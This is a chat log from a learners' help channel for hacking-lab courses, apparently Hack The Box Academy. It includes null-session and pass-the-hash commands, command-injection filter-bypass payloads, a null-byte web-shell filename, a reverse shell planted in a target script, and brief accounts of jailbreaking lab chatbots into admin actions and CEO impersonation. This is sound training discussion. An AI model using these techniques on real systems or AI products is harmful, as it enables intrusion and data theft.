I was hoping to have some assistance with the skills assessment for Pivoting, Tunneling, and Port Forwarding. I have gotten to the last box but the network location is disconnected and unable to be reconnected. Even in the 'show solution' inside the module, it has it enabled. Other walkthroughs I have found has the drive enabled already. Is there something I need to do to enable it?
I presume you've restarted the lab just in case its not intentional?
No I haven't. Didn't think that would help because I thought the only thing generated was the initial host. I'll do that now
We solved this one together \o/ good job
Hey everyone. I'm working on the Footprinting module and am currently doing the exercises for SMTP. I'm stuck on the second exercise where I'm enumerating the users.
Honestly I've been struggling with all of the "brute force" kind of enumerations. The scans seem to take forever, and I never seem to find anything.
In similar exercises like for DNS enum, I've ended up looking at the solutions just to see that I was doing the right thing but in a slightly wrong way or just with the wrong wordlist or something simple. I'm hoping that someone can help me figure out how to speed up the process or should I just pivot to a different wordlist or new angle if I don't find anything within a minute or two?
Seemed like it failed to pick up the config, given all the resources online and the walkthrough suggest its meant to be available, ill remember to restart if I see that again! ty
I was going crazy like I missed something..
half the time I am missing something or going crazy so I feel ya, doesn't help xD
anyone can give a small help on Client-Side Prototype pollution I have a locally working exploit not sure what I am missing on remote
@desert pelican ; please don't share screenshots relating to the AEN module as it's tier 2
Are you saying ask help without sharing screenshots?
i'm saying your screenshots break into spoiler territory, I'd say try different proxy tools if one isn't getting you the results you want, like ligolo-ng
Hello please can you help me with exploiting thick clients vulnerability on the attacking common applications I've stuck far too long change the source code but it just gives out a lot of errors
I don't know how I'll compile the invoker well
It's the only one that's giving me issue
'Fatty' either 0xdf or ippsec; that should help
I checked it but it's a different compile that was used
Is there any other that uses javac
probably exists out there, you'll have to do the legwork of researching that on your own
Here on the nibbles web footprinting page we r making an educated guess on the password, is this a better approach than to make use of a wordlist to figure out the password
Well technically it's not, aside from using a tailored word list made from the site guessing is really your best bet especially when the site has an ip blacklist after a few unsuccessful attempts
During the SQLMap Essentials - Attack Tuning module (question "What's the contents of table flag5? (Case #5)"), sqlmap returned a string containing \x02A. The exercise expected the final flag with that sequence replaced by _, but I don't understand why \x02A should map to _.
Has anyone seen this behavior and could explain it to me please ?
because that's the hex for the ascii code
it's weird, but it checks out
sometimes the attack tuning thing doesn't properly decode characters and you might wanna rerun the attack a few times
okey bcs i checked for the hex ->ascii and it gave me * not _
it's just how timing attacks work, iirc that's the default first one it tries ¯\_(ツ)_/¯
Is the DC on AEN US East 1 down for anyone else?
Headline: major network outage at inlanefreight!
there's no specific vpn for AEN; also US East isn't the name of any of the vpn files
Not sure if this is the right channel to ask, so correct me if not. Would my Academy Student subscription remain active after i graduate from uni ? I verified with chat option
that heavily depends on if your uni keeps student/alumni emails active; i suggest using your main email and putting your uni email as a secondary one in your account settings at the very least
I didn't verify using uni email. I used id card verification from support
I mean support can and does regularly check for active enrollment in an institution as far as I know. But that's a question you should ask to support, i'm not staff so I can only guess as to what it is
Oh.. okay. Thanks for your input.
thx !
in the initial foothold section on nibbles how do we decide which plugin to check for rce ?
Usually you'd look for plugins that allow file uploads or if you can upload a plugin yourself even better.
Can someone help with the cwes SQL injection skill assesment? I can't even get the answer to the first question. I've tried all the auth bypass payloads and all the solutions I found posted online are on a different site, inlanefreight
please can someone help me still stuck on the exploiting thick client vulnerability i got the server tho but still stuck cuz it's not running
thanks, that worked.
gonna delete since the module is above tier 0; so spoilers
anyone got the
Introduction to Windows Evasion Techniques module
Process Injection section?
should I go with my own technique of getting shell?
bc the given example is not working out in logs its saying:
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Undetected by Microsoft Defender Antivirus
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Running C:\Alpha\ProcessInjection\htb-fuck.exe
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Checking for calc.exe...
[10/29/2025 23:27:57] C:\Alpha\ProcessInjection\htb.exe - OK - Timeout reached, killing process
what do these errors mean on nibbles monitor.sh file ? although i did manage to get a reverse shell
It means you broke the shell file
remove the -a and should be fine
Oo why did it run successfully tho?
Well, you just broke that part of the shell file, the other parts should be fine
Oh..so that means if I want I can erase the contents of monitor.sh completely, just include my reverse shell payload and still everything will work fine
well, the monitor itself will break 
ACTIVE DIRECTORY ENUMERATION & ATTACKS
ACL Abuse Tactics
Q) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
so in the session they used the user wlay to get access to the user damundsen but i dont have the user wlay, so i assumed i gotta use the user htb-student to see which acl i can abuse, but when i started the enumeration i cant use any command, it just gets stuck, so i cant even get which users i can abuse. do i need to use wlay, or am i going the correct way and the server is just slow?
but it will still give the reverse shell right?
of course, but just saying it's bad opsec to break someone's script
understood. Thx. I am just curious with all the possibilities
Is there a more reliable ping sweep for powershell/windows?
powershell ping sweep on AEN came back as False for the host when I was doing a 1.100 sweep, now its come back as True on a much closer range (to test if it was a one off)
or is the learning here to re-run sweeps, to double check. In which case its a low hanging fruit I can do each time
I need a nudge with AI Evasion - First Order Attacks - Challenge 1. Have finished all the flags in this module and only this one is left. Am not able to get the right parameters to balance detection vs the limit. Its a new module. If someone has completed this challenge could you pls DM me.
This is a 4.2 binary release for x64 and x86 systems
Full Changelog: https://github.com/dexit/fping-windows/commits/fping-4-2-win-binary
fping 4.2 (2019-02-19)
New features
New option -x / --reach...
thank you, I shall!
You can try the command like this .\fping.exe -asgq 192.168.1.0/24
Bumping this. Still stuck and not really understanding how to forward the port I need. Also not able to get a meterpreter shell, but have a normal shell as SYSTEM on BACKUP.
i have tried downloading linpeas several times now and i can't seem to get the linpeas.sh file. anyone know where it is located or how i can get it ?
Hi everyone, can someone tell me what is the right reasoning to select the right rule and the right mask to resolve the 2nd and the 3rd question of Hashcat section?
when i have an hash, i have no additional informations
try locate linpeas.sh or which linpeas.sh
It is nowhere to be found, both locate and find cannot find it and it seems like the linpeas sh is not in the github li peass
try to reinstall and see if a message appears saying the package is already installed
It does say linpeass is installed but the linpeass.sh file is not there. Reinstall does not work since it already exists
try it and look if some message spawn
[★]$ netcat -nv -p 53 10.129.240.238 50000
Can't grab 0.0.0.0:53 with bind : Permission denied
Hi! In "Incident Handling Process" module, Skills Assessment's first tasks I'm having trouble connecting to the target from the pwnbox. I try xfreerdp /v:10.129.119.61 /u:htb-analyst /p:P3n#31337@LOG and I get
[06:50:35:669] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:670] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Need hints for fixing it
i have removed linpeass completely and reinstalled it using git clone. linpeass.sh should be in this folder right? (fixed i cloned the whole github itself but i have to download only the linpeass.sh file )
You are not expected to establish an RDP connection
Hi !
I have a question about Documentation & Reporting module. When we write our report, we need to complete the Attack Chain part. But what if we have many options ? Do we need to precise all of them ? I guess so but if there are 100 ways, it is a lot...
Yes, you have to specify every step, and yes, that can be a lot of text.
Hi. Getting high ping on all EU Academy VPN servers. Previously, I used to get around 150 ms which made the experience smoother, but ever since the recent issue with the EU servers, the ping has remained high. Is there any way to resolve this? Thanks.
Note: I am based in South Asia.
Somebody please help me
This is the only section left for me to complete my path
Did someone finish the Using CrackMapExec: Skills Assessment, and could give me a nudge on finding the account
Think I've found an error in Command Injections | Identifying Filters
They say to use the other operators [ new line and pipe ] I at first didn't see that line, and other operators work, not sure if that's intended
Ironically - neither \n or | worked for this
Yeah this seems to be a bugged module
Hi, I have a question about the Command Injection module. In the section "Bypassing Blacklisted Commands" there is the following exercise:
who$@ami
w\ho\am\i
Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?
The first payload works, but the second didn't.
Encoding the backslash as %5C obviously didn't work because of the filter.
Is there an environment variable or something I could use for generating the backslash in Linux?
impacket-wmiexec david@target_ip_here -hashes :david_hash_here
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\david
C:\>type \\DC01\david\david.txt
Access is denied.
https://academy.hackthebox.com/module/147/section/1638
why doesn't it work, I am logged in under david, but cant read his share
maybe try it with the character shifting technique?
did you url-encode the operator?
Thanks, yes, that's what I'm trying, but I didn't get it working. My VM Bash only understands the shifted version when I echo the command and pipe it to Bash or use eval.
Payloads:
$ w$(tr...
bash: w\ho\am\i: command not found
$ w\ho\am\i
htb-ac-745345
$ eval w$(tr...
htb-ac-745345
$ echo w$(tr...[)i | bash
htb-ac-745345
When I inject that into the web request, the website loads, but the command doesn't get executed. It might be a command-line error. Even when I shift the pipe character and try to pipe it to Bash, I don't get a response either. Is there something I'm missing to get it to execute? I've already tried several subshell combinations.
yeah
yoo guys im kinda stuck in file inclusion skill assessment
can i PM anyone to give me an insight on what i might do wrong?
Well, you got it wrong then, the answer is not bugged, just tested.
You didn't URL-encode it
Can guarantee I tried, which is why I linked the forum post I did lol
Not sure what you did. Regardless, I just tested the lab and you can rest assured that everything is working as intended, nothing is broken.
Im on my last days before doing the exam, I'm doing the Skill Assessment for Using CrackMapExec and Im stuck, anyone finished this module who can give me a nudge, I really want to know what I'm missing here
The question is: What's the password of the account you found?
The hint is that I should use a null session, I've tried to following:
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --users
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --shares
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --pass-pol
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --users
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --shares
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --pass-pol
You're forgetting one method, it starts with an "r"
I know what you are saying, it's 2 words right?
Hi All, just started learning & already hit a snag, I'm following the "meow write up" but the nmap is not bringing anything up. what am I doing wrong? I've typed in sud nmap -sV {IP address} i pasted the actual IP address
Are you connected to the vpn? or on a pwnbox?
pwnbox... i think
you are on the parrot machine in your browser?
Target is running?
i ping'd it and it was connected
did you try to run nmap with -Pn
Tunnel vision will cause this, as I ran into the same issue. Spawn the target and connect to it. There will be a web interface for you to test your input and completion will give you the flag. Sharing in case others ran into the same issue.
That did happen to me and when I attempted the next day after not getting anywhere I realized that
hi amigos
i'm on Skills Assessment - Password Attacks
i got initial access to DMZ01 machine and then I'm unable to make progress.
tried to forward port from the dmz01 and there is no result!!!!!
any help frendos?
Hello anyone did process injection Attacks and detection module ? How much of a good is it in terms of attacking perspective
can someone help me to do this. this is SQL Injection Fundamentals skill assessment.
Does anyone have 2 seconds? I'm just not sure what this question is asking for as an answer lol
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
I have the output I just don't know what it wants
Or this command is working just not outputting the answer? Lol?
Working on API Attacks -> Broken Authentication: should I be getting this many errors?
To add - only seeing the following after running that
. ./style.css ./index.php
But I don't see a flag file or anything. Please @ with responses
it's asking for the output, but even then, that doesn't look right
i ran sqlmap on this but couldn't log in. any hint pls
tail -n 1 -> should only give 1 output
sqlmap isn't required for the sql injections fundamentals skill assessment; try injecting in various places
also try forcing an error
That's why I'm confused
i tried as i can(know). that is y i am asking help. 🥲
then something went wrong with your command obfuscation
I've tried 4 different ways, all have different outputs, that aren't aligning with each other, and it's the same command lol
maybe you're looking at the login too early
i watched a yt video and that skill assessment was different than mine. atleast there is not a hint. can u give a hint for find admin's password hash
If I follow the Hex signature in the memory map and try to dump to file, it looks like an unfinished program and cannot be inspected properly. honestly getting lost at this section with 0 reverse knowledge
Could anyone give me a few hints regarding the Module sqlmap -> Challenge6... I have not worked too much with SQL before and I have no clue, how I should get to the correct prefix? Any tips?
look into other endpoints first
that module is above tier 0; don't share screenshots from the module/lab
Nevertheless, I have solved the exercise, but imho it's the worst exercise in pentesting path so far. I don't know what happens on the screen, the explanation is not clear enough... No introduction to reverse engineering (is this even a part of the path), so it's hard
join the haters club for it (plenty of people agree that it's completely out of left field and not relevant or wanted in the path)
at least i'm not alone
Hey guys I need help with something on Attacking Enterprise Networks module
Hello, I'm having a problem in the Linux Fundamentals section, specifically in the "Filter Content" part of the last question where I'm asked to use curl. I don't know if my command is wrong or if I've missed something. If someone could help me out, that would be great.
As you can see, I did it offline in the first instance, and online in the second (screenshot).
I've also been stuck in this part for a few days
It's not easy to understand, hopefully someone can help us x)
You cant do this one offline, also academy targets (10.129.x.x) dont have internet connectivity. If youre on the free account I believe that the pwnbox doesnt have access to https://inlanefreight.com
Can I do it directly from my Linux machine on my PC?
I just finished working on The Live Engagement module under shells & payloads section. Would anyone be able to let me know how we were supposed to find creds for host 1 "manage"?
If spoiler pls delete
from here it's starting to get tougher if you just follow the module lectures. you need to think outside the box. However, if you haven't looked at the "hints" you need to, otherwise you'll scratch your head trying to figure out what's next. I also find trying to take a peek at the solution after doing all things is not bad at all.
Guy i need help, i already add inlanefreight.local to the hosts file, but when i used ping or getent hosts it can't resolve the name why?
if i just ping the IP address, it works normally.
Yoo guyss, i need help with the file inclusion skill assessments, my RCE attempts is always failed and im sure it is using the method i use
Yeah I ended up having to use the hint. I found one of the vectors by enumerating but the second one I could not find creds anywhere :(. I feel bad using a hint sometimes but I try to learn from them.
Agreed! It's working as it should.
try it with base64 encoding
I am currently working on API Attack module, and stuck in Broken Object Property Level Authorization
Anyone available for help
I am not able to find one of the apis for the relevant role
All 4 things I've tried included B64
Maybe it's not intended to work in that specific question due to filters in place. Try it in the next section perhaps.
base64 works just fine dm me what you tried
Try scanning common ports like 445,3389,5985 etc... etc
Otherwise try a different pivoting method/tool
I was able to get into another machine however I am now struggling to transfer files from the Windows server onto my attack host. I have tried moving the file into an SMB share and doing it that way, but i can't access the share.
Plenty of rdp tools have an option that allows mounting a drive, xfreerdp has the /drive: option
let me give that a try
Got it
Legit spent an hour trying to get it through command line....
Thank you
For Module "MSSQL, Exchange & SCCM Attacks" on Section "Introduction to SCCM" I'm facing an issue using pxethief.py. I'm using exactly the same command as given on the module and I keep getting this error response:
[-] No DHCP responses recieved from MECM server 172.50.0.30. This may indicate that the wrong IP address was provided or that there are firewall restrictions blocking DHCP packets to the required ports
I already tried to reset the machine, but it's still not working. I also tried other internal IP addresses as well I found while enumerating. Nothing seems to work. If someone can help, thanks!!!
also try Invoke-FileUpload.ps1
is it a vm?
Yup. I've RDP'd to the given Windows Machine
bridged or nat
I did try that at one point, however I could not download the module from github on the windows machine.
Do you mean the HTB's Windows VM?
oh no i mean your base machine
My base's NAT'd.
you mean you tried download from github on target machine?
swap to bridged
Yes that is correct
Well, the target machine is in internal network which means no internet connection, we need to transfer from attack host to target windows.
only thing I can think of atm - can cause dhcp issues
Do you mean that's the reason I couldn't solve it? How does the network config affect HTB's machine as it's internal network?
Yes, however this whole module I have been having trouble with proxychains and running commands on my attack host.
It has been a constant nightmare of connection errors. And now I am trying to get the NTDS.dit file and am unable to via netexec because of these issues that I am having.
I don't know if that's the reason, but it can deffo mess with that
it's like a 2 second thing anyway so like if it doesn't work meh
I tried using Pwnbox and got the same error.
I was able to grab the hash and complete the skills assessment. Easily the hardest skills assessment thus far.
nat drops l2 broadcast packets - only reason i suggested it >.<
I see! Have you finished the module? If you did - do you recall any issues using pxethief.py?
na i just started but work stuff
that's actually the exact module i'm excited for since relevant
Ah, you just started the module? Good luck!!
no no the cape material X:
but that's the module i'm after ya
since sccm attacks are kind of hot rn
I see! It's been amazing path. This is my last module I'm working on. Love it
can you ping it and all that?
Yes I can ping the IP
you already reset it too
Yah, twice even
On this same section now myself and having the same problem. Nothing gone over in the section seems to work.
@acoustic owl any ideas?
^ this guy has a cape lol maybe he can help XD
If I recall correctly, I had a Ligolo pivot active before attempting this.
are you allowed to post the actual cmd?
Hello! So did you attempt to coerce PXE boot from another host than SRV05?
I have a tunneled connection running, but I'm unsure how this will benefit me on this question. If you can DM me I'd highly appreciate it, thanks...!!!
The original command?
thx @foggy monolith x; sorry if I tossed ya under the bus - sooo didn't mean to
ya
i always screw up discord rules in srvrs bc i'm in so many ;/
so i am trying to be careful
Sure, I don't see how it'd be a spoiler:
python .\pxethief.py 2 172.50.0.30
Yes I did and was successful, but only when I used the Windows version of Python on SRV05 to run it. Something that needs to be emphasized I think.
Update: seems like you've got that down.
Maybe try a lab reset too. Also, I was logged in as the test user, not sure if that helps.
That's okay. I've reset the lab a few times now and also running as the test user that's given.
I'll try another host as the attack host than SRV05, if it's possible
Meanwhile, am I like the only one here who's working through the AI job role path or something?
I started it and literally stopped myself :3
since I actually have to study and focus on the cape
and I'm super adhd soooooo I would have just ended up doing that and not what I needed
lol
Never mind, got it. Had to chain something from Jailbreaks I with something else from Jailbreaks II.
Can someone provide a real world example of how I could apply the model learned in “Questioning” under “The process” in the “Learning process” module?
It was a lot of reading and seemed a bit too much. I don’t really get the takeaway lol. Or is it the whole visual model / diagram that should be used?
Thanks in advance for your time everyone!
Haha, I can relate as being diagnosed with ADHD. I'm hyper-fixated on the CAPE path and can't think of doing anything other than grinding the modules non-stop.
Its a general visual model from what I recall. I dont remember too much from that module tbh its been a bit
Thanks, I thought so, seemed worth while to check.
To clarify further it’s something more for yourself to help with phrasing a question?
Yeah, phrasing questions can help you either clarify how you approach it (rubber ducky) or help others help you
Im getting errors ❌
Im getting <specific error> ✅
Great, I thought so. Very, very long winded way to explain the concept
It probably helped me most that I’ve known about similar models / concepts beforehand.
Maybe my brain just hasn’t been working for the past three days. Thanks for your time clarifying!
Its alright, you can either take the module to heart or just discard most of it. Its mostly just theory
Howdy! I'm currently working on the Footprinting module, and in the SMB section. I've managed to connect to the correct SMB share, and found the flag.txt as it requests, however the flag does not seem to be accepted by the answer section, and states it as being incorrect. I'm not quite sure where to go from here, because of that hah!
check for leading/trailing spaces
Aye, unfortunately, that does not seem to be the error
Its formatted correctly as far as I can tell, cleanly copied, etc
is it one of those flags that is a hash or an HTB{} flag?
It is indeed one of the HTB{} flags
could you DM me the flag and a screenshot of the question not accepting it?
Sure!
arent there supposed to be creds to rdp?
it is in the "YARA & Sigma for SOC Analysts"
check the hint
oh that works as well, tysm!
Hi all, I'm new and asking for any help with this module:
Attacking AI - Application and System
Section: Rogue Actions
I appreciate any suggestions or guidance on this! Or even anyone facing the same issue.
So far I can successfully claim admin and the chatbot says SQLQuery plugin is available, and I've checked the database: db, tables: items, and column: id. It only contains ids: 1-4 as far as I can tell.
Should I be looking at a different attack vector entirely?
I've also tried the username injection, however, little success with that method as the chatbot skips over displaying username with payload.
Hello!
I have troubles connecting to the Windows targets in the Windows Fundamentals module. It does not matter if I connect over my local machine using the VPN or if I use the PWNBOX. The connection gets permanently terminated. I also tried to spawn the target again, but without success. Any help is appreciated!
try changing vpn regions, also making sure you're not using both the VPN and the PWNBOX at the same time, use TCP vpn
im stuck at the same assesment. i've tried poking around in all the fields. but i havent been able to bypass or inject into any of them.
@austere pine you're thinking about it wrong; when you force an error that means you may be doing something right (even if the error isn't reflected back at you)
i dont understand. is my input going to the database even if its getting sanitised? i dont know how i can get what i want with that since, nothings worked so far
you know that something causes a 500 error; a 500 error isn't necessarily a bad thing you know...
i will say you were onto something with the parameter @austere pine ;
thanks for the help
my brain is fried rn. i will sleep on it and maybe when i wake up the answer will appear
you'll discover the True path in the end but rest well
I am having trouble rdp'ing(with xfreerdp) into remote machines and my standard way is not working(i usually add the dynamic-flag) because when I do it the standard way the screen is usually greyed out. I tried all of the recommendations online and they are not working.
xfreerdp /v:10.129.250.12 /u:.\Administrator /p:"AnotherC0mpl3xP4$$" /size:1920x1080 /bpp:32 /cert:ignore /rfx
[04:24:39:861] [13938:13939] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
What do you recommend I do
wrap the password in singlequotes
bash is evaluating $$ to the current shell PID
single quotes is strict string parsing, not hybrid
also you don't need to do the .\ for the username
NTSTATUS: STATUS_LOGON_FAILURE <- this indicates an error with the username and/or password
xfreerdp /v:10.129.250.12 /u:.\Administrator /p:'AnotherC0mpl3xP4$$' /size:1920x1080 /bpp:32 /cert:ignore /rfx
[04:38:48:451] [35358:35359] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
So only remove that?
This solution works (in case anyone else experienced similar problems): xfreerdp /v:10.129.250.12 /u:Administrator /p:'AnotherC0mpl3xP4$$' /f /bpp:32 /cert:ignore /rfx
Regarding this that I asked earlier, I got a response from HTB support.
It’s an issue with their EU VPN Server. They told me it should work on the US server.
Just heads up if anyone else having lab issues
Yep, I'm in the "Citrix Breakout" module and when I rdp into the machine I get the Xfce desktop environment. Is that intended? It doesn't make much sense to me
It was a long time ago so I don't remember, but are you on the EU VPN server? I was having major issues on EU VPN and support told me to switch to the US Servers.
Yes, EU server. Earlier I couldn't even log in. Now I get this Xfce desktop which is weird, because it's unix based and I'm supposed to work on a Windows machine
try changing to US vpn server
Change to US VPN. I wasted too much time because EU not working
Ok, thanks
Is something wrong with EU VPN servers? Getting very high ping. The https://status.hackthebox.com/ says otherwise. Thanks.
seems like it's having issues rn; try US servers.
I did, but the ping is high there as well due to my region. I’m based in South Asia, so the US servers don’t perform well for me. The EU servers used to be really smooth, but unfortunately, they haven’t been working properly lately.
reach out to support, but if it's the EU servers having issues then you're gonna have to wait for the EU servers to stop being silly, or suffer the lag of US servers
Yes you can
Can I get a nudge for the Command Injections | Skill Assessment? I'm damn near pulling my hair out, I've tried damn near everything I can think of, and all I get in return from Burp is a 302 Found but no contents. I don't know if I have the wrong injection point or what, but I'm going crazy
dm please
Currently I am working on the Applications of AI in Infosec course skills assessment. I've created the model, trained it using GPU and evaluated it locally with accuracy ~94%. However, when I try to upload it I get "invalid model file".
Does anyone know if it is required to upload a .joblib or is a .pth allowed?
anyone else have a lot of trouble with the module "Intro to C2 Operations with Sliver"?
The RDP and the connection in general are extremely unstable
can someone help me with File Upload Attacks whitelist filters module? i cannot seem to fuzz the correct extension and also i can upload for instance shell.php\x00.gif but i cannot execute gif file any hints to help me out? i've been stuck for hours
did you do it? i can help
dm me
Hey all, in the socks over rdp module in the double pivoting section, this just doesn't seem to work:
regsvr32.exe SocksOverRDP-Plugin.dll
This is all I get haha
Real time threat protection is turned off btw
Were you able to get it?
I’m just as confused lmfao
Try this:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://IPHERE -H 'Host:FUZZ.inlanefreight.local'
and make sure to use -fs when you have an idea which size is incorrect so you can filter it out
update local to .com if that is the target ofc
The above works for my needs, so should yours. Not sure otherwise
does inlanefreight.com respond to icmp requests? i'm trying to ping it but not getting anything. i'm not sure if i'm having network issues
i can reach www.inlanefreight.com in a browser no problem
I don't get a ping back either... by design perhaps?
Hi there, anyone willing to discuss about SSRF API module attack path?, to send he/she a DM!!
defender being off != RTP being disabled
that module doesn't use an ip for this it's attacking a publicly available website
it's not designed to accept icmp echo requests, as far as I know
also @cosmic vine don't reveal potential answers, even behind spoiler tags...
roger, good spot. Just grabbed from my notes and moved on..oops
notes are good if you know when and how to apply them
all good; you tried to help, it just wasn't applicable in this specific instance
Hello, someone could help with the API Attack skills assessment? ||Trying to reset a supplier password with the security question... ||
Hello there!
Quick question ffuf wise :
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://IP:PORT/w2ksvrus/FUZZ.html -e .php,.html,.txt,.bak,.js -v
This command will fuzz for .../config.php.html, .../config.html.html, .../config.txt.html,... yadeeyada, correct?
correct, it appends the extension (From what I recall) directly after, i mean one way to know for sure is to just test it out... though why you'd do a double ext is beyond me
Check your DMs, I sent you 2 of them on this matter.
@icy dagger are you open as well?
I'm just very confused because this should be a fairly straightforward task. It's a public facing site which doesn't require any additional configuration. The solution doesn't match what I'm seeing. I'm seeing some of the subdomains but not all so it's almost as if those subdomains don't exist anymore
Hi all - I’m blocked on the SQLMap essentials - Skills Assessment. I’ve been probing the app with Burp and reviewed every request in the proxy, but there are no GET requests with query params and no POSTs that look relevant. I also tried interacting with the site (commenting, adding products to cart, going through checkout, clicking blog links) and still can’t find a suitable input point. If someone who’s completed it can share a hint about where to look next (not the full solution), that would be super helpful. Thanks!
For context, I was able to ||get the chatbot to pretend to be the CEO while divulging information that would absolutely get any CEO banned from his or her own company|| but the prompt necessary to do that was so long that I got a "Prompt length is longer than max length" error (screenshots in DM if you're reading this @terse sage) when throwing the summary bot at the resulting conversation. @icy dagger any ideas?
One request you mentioned should have worked unless they changed it
I think they changed it. If I’m thinking correctly, to me there’s an obvious one, but I only get the #.
What’s the question
They haven't changed it
Also think of a possible WAF idk?
Likely overlooked something
@vapid sierra then in that case you’re on that right track and it’s in one of those you mentioned, pretty obvious to what the website is all about..
mmmh thx a lot !
@fathom pendant any ideas on bloat-trimming this?
If you're still stuck, feel free to dm me.
Haven't done the module, couldn't tell ya
I wanna help In HTTPs/TLS Attacks Module Skill Assessment can I DM anyone please
Alright, figured it out on my own. For those curious, yes the information gathered from step 1 absolutely needs to be reused for step 2 to work at all.
Find out the machine hardware name and submit it as the answer. Could someone help me with this?
uname --help to figure out which might get you the hardware name
I did it, thank you so much!
Yes, I’m aware, RTP is disabled
Hmm, I’m getting this error on literally the first machine lol
they're saying they used ligolo to bypass the fuckery i think lol.
pivoting tunnelling path in remote/reverse port fwding w/ ssh finding it hard to get a reverse shell is there a step missing in the module? I'm following exactly as laid out in the module but feels like there's something missing bc it mentions to download the payload in windows box prior to getting a reverse shell executed of the same box? This is separate from challenge questions
sorry guys I know this is the wrong chat for this but Im struggling with the machine Reddish and I remember hearing that it's broken, is that still the case?
Sorry!
Ah, lol, mb, I'll probably do that too now
nevermind I got it LETS GOOOOO
@vast sun please don't post flags, check for leading/trailing spaces
what's the point of testing double extension like html.html
Thanks! I was a bit confused as well, this is directly from the Fuzzing module
Hi, I am a bit lost with the API Attack skill assessment, could someone give me a nudge to bypass the security question?
sadly I have not taken notes on skills assessment, but I remember it being something obvious
if you dm me I can probably help you
You need to explore filtering on securityQuestion, some users might have set theirs. Can't say much more else it'd not be a nudge. Goodluck!
Yeah, I found them, but somehow I dont find the right word
If brute forcing make sure you have a good array of 'words' of that specific type.
The answer to the securityquestion isn't actually in the API output in case you were wondering why you can't find the word?
can dm if you want to take this offline. GL anyway!
hey
on Credential Hunting in Linux module
the "Examine the target and find out the password of the user Will. Then, submit the password as the answer." machine is not working correctly
when I connect ssh after 5 min it stuck and I can do anything, also cant ping or scan it for status
that must be section, which module ?
AD
What is the default Minimum password length when a new domain is created? (One number)
from CPTS
Anyone has any clue??
must be 8
no
but why can't you enum? you have any type of access ? e.g. smb ?
you can pull it via smb
no there are no ports open only 22 and 3389
so thats why I came here that how u all enum it
??
Kraddy this information is in the module text...
Theres a table with the data you require. Re-read the section text on Domain Password Policy.
Tool Ports
nmblookup 137/UDP
nbtstat 137/UDP
net 139/TCP, 135/TCP, TCP and UDP 135 and 49152-65535
rpcclient 135/TCP
smbclient 445/TCP
this right??
none of these ports are open
so crackmap enum4linux rpcclient none of them worked
Why are you enumerating for the password policy when the question is asking you for the Minimum password length. Which is in the module text
well pw policy would detail length
even if it's in the text; you won't always be lucky with the text aligning with the answers
I suppose so Marcie, but in this case "I tried 8" and its 7 in the table above, doesn't make much sense
ok I got it sorry man this module was just crap I thought I will enumerate it
They will have to spawn the lab and enumerate the PW length for the second question though, totally right
you only think it's crap because you haven't been making progress.
its not like that lee
it really is
hello can anyone help me with file upload type filters, i have tried everything, bruteforced content-type, after that i did bruteforce all php extensions that work with content-type and none of them gives me shell, i also bypassed MIME type checking
ok so why then give us the ssh if the answer was already above
I rescind my statement, I recall a number of questions that stung me this way. Fair enough
did you try double exts? both with .php.ext and .ext.php
?? @fathom pendant
because the answer can be found within the environment still
or images.pht.jpg
that's way too many extensions also try and avoid null wherever possible
The domain of that specific host that you must spawn, will have the pwMinLength value set, and it wants you to go find out that information now, using what you learnt in the module. @sharp pecan
it's two parts; the minimum pw of a generated account can be less than the min length of the pw requirement
learn something new every day, ty
yeah exactly thats why ssh was not needed
you can retrieve the info from an ssh session; ssh is still part of the environment
@dark jay the module is above tier 0 so please try and avoid spoiling things
yeah but there were only 2 ports that are opened 22, 3389 how will try --- crackmapexec, rpc
SSH to the user with credentials provided Kraddy, enumerate policy from there....
you don't need rpc to enumerate that information
